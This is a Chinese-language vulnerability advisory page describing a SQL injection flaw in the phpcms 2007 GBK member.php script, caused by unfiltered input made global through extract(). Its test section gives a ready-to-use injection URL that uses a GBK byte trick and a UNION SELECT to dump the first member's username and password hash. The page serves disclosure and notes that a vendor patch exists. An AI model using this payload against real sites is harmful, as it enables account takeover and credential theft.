频道栏目
首页 > 资讯 > 安全公告 > 正文

phpcms 2007网站管理系统Member.php页面SQL注入漏洞

2010-06-25 08:56:35           
收藏   我要投稿

影响版本:
phpcms 2007 GBK
漏洞描述:
在member/member.php的第4行,代码如下:

   1. ..............  
   2. $m = $db->get_one( SELECT * FROM .TABLE_MEMBER. m , .TABLE_MEMBER_INFO. i WHERE m.userid=i.userid AND m.username=
   3. $username
   4.   , CACHE ,86400);  
   5. .............. 

username变量未经过过滤就进入查询了,我们在其包含的include/common.inc.php文件中有如下代码:

   1. ................  
   2. @extract($_POST, EXTR_OVERWRITE);  
   3. @extract($_GET, EXTR_OVERWRITE);  
   4. ...............
<*参考
http://www.00day.cn
*>
测试方法:

本站提供程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!http://ssvdb.com/phpcms/member/member.php?username=luoye%cf union/**/select/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,username,password,57,58,59,60,61,62,63,64,65/**/from/**/phpcms_member/**/where/**/userid=1/*SEBUG安全建议:
厂商补丁:
PHPCMS 2007
----------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
http://www.phpcms.cn

上一篇:PHPCMS 2007网站管理系统common.inc.php页面变量覆盖漏洞
下一篇:风讯网站管理系统存在SQL漏洞
相关文章
图文推荐

关于我们 | 联系我们 | 广告服务 | 投资合作 | 版权申明 | 在线帮助 | 网站地图 | 作品发布 | Vip技术培训 | 举报中心

版权所有: 红黑联盟--致力于做实用的IT技术学习网站